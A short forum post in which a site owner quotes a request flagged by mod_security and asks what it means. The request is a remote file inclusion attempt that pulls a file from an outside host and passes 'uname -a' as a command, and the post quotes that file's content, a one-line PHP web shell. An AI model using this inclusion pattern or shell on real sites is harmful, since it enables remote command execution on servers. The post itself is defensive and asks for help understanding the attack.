whats this hacker up to ?

mydomain.com/pt/content.php?x=http://domainremoved.com/ttt.txt&cmd=uname%20-a HTTP/1.0

This keeps appearing in mod_security is it a hack attempt or a misguided tourist ?

if you go ttt.txt

you get this in a text file

<?php PassThru($cmd); ?>

no threat to us but would like to know what he is trying to do , thanks

 

 

 

 

Top